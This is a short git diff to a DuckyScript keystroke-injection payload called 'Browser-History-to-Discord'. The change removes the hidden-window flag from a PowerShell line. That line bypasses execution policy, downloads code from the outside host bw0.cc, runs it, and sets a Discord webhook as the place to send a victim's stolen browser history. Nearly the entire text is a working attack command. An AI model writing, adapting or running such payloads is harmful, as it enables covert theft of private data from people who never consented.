diff --git a/Browser-History-to-Discord/Browser-History-to-Discord.txt b/Browser-History-to-Discord/Browser-History-to-Discord.txt index 444b0ba..9e7f612 100644 --- a/Browser-History-to-Discord/Browser-History-to-Discord.txt +++ b/Browser-History-to-Discord/Browser-History-to-Discord.txt @@ -14,7 +14,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; iex (irm bw0.cc/hist) +STRING powershell -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; iex (irm bw0.cc/hist) ENTER